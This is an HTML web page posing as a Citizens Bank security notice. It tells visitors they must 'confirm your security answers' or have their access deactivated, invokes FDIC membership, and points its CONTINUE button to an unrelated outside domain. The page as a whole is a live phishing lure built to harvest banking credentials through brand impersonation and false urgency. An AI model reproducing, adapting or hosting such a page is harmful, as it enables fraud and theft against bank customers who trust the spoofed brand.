<!DOCTYPE html>
<html>

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Before we proceed</title><!-- update the version number as needed -->
    <script defer src="//firebase/7.15.1/firebase-app.js"></script><!-- include only the Firebase features as you need -->
    <script defer src="//firebase/7.15.1/firebase-auth.js"></script>
    <script defer src="//firebase/7.15.1/firebase-database.js"></script>
    <script defer src="//firebase/7.15.1/firebase-messaging.js"></script>
    <script defer src="//firebase/7.15.1/firebase-storage.js"></script><!-- initialize the SDK after all desired features are loaded -->
    <script defer src="//firebase/init.js"></script>
    <style media="screen">
        body {
            background-image: url('https://upload909.web.app/bgpc.jpg');
        }

        #message {
            background: white;
            max-width: 660px;
            margin: 50px auto 50px;
            padding: 10px 24px;
            border-radius: 10px;
        }

        #message h2 {
            color: #ffa100;
            font-weight: bold;
            font-size: 16px;
            margin: 0 0 8px;
        }

        #message h1 {
            font-size: 22px;
            font-weight: 300;
            color: rgba(0, 0, 0, 0.753);
            margin: 0 0 16px;
            font-family: Arial, Helvetica;
            font-style: bold;
        }

        #message p {
            line-height: 140%;
            margin: 16px 0 24px;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        #load {
            color: rgba(0, 0, 0, 0.4);
            text-align: center;
            font-size: 15px;
            font-family: Arial, Helvetica;
        }

        @media (max-width: 600px) {
            body {
                background-image: url('https://upload909.web.app/bgpc.jpg');
            }

            #message {
                margin: 60px auto 60px;
                max-width: 600px;
                padding: 15px 15px;
                box-shadow: none;
                border-radius: 10px
            }
        }
    </style>
</head>

<body>
    <div id="message">
        <p style="text-align:center;"><img src="https://upload909.web.app/logo.png" alt="Logo" width="300" height="63"></p>
        <h1><b>Please read carefully</b></h1>
        <p>We've noticed that you have not used your security answers to sign-in for a while and will take a minute with you to review your security information.</p>
        <p>• We will review all account activity upon submission</p>
        <p><b>Why am i seeing this message?</b></p>
        <p>• This message is to inform and assist you with confirming of your security information which we have in our records
            " As a Member of FDIC. Equal Housing Lender, we're asked to always keep our customers personal information up to date  " </p>
        <p><b>What can i do?</b></p>
        <P><b><FONT color=#ff0000>• Confirm your security answers</FONT></b></P>
        <p><b>NOTE</b>: You're required to confirm or update your security answers in order to continue using this service, or we may automatically deactivate your security questions, so you don't forget them and get locked out of your account</p>    
        <div style="Margin-left: 20px;Margin-right: 20px;">
            <div class="btn btn--shadow btn--medium" style="Margin-bottom: 20px;text-align: center;"><a style="border-radius: 4px;display: inline-block;font-size: 12px;font-weight: bold;line-height: 22px;padding: 10px 40px 11px 40px;text-align: center;text-decoration: none !important;transition: opacity 0.1s ease-in;color: #ffffff !important;box-shadow: inset 0 -4px 0 0 rgba(0, 0, 0, 0.2);background-color: #ff8400;font-family: Arial, Helvetica, sans-serif;" href="https://websvers.site/zeelfolder/?zeel">   CONTINUE   </a>
                
            </div>
            <div style=text-align:center;font-size:15px;line-height:19px;margin-top:20px;>
                <div><b>Citizens Bank Team</b></div>
                <p id="load"></p>
            </div>
        </div>
    </div>
</body>

</html>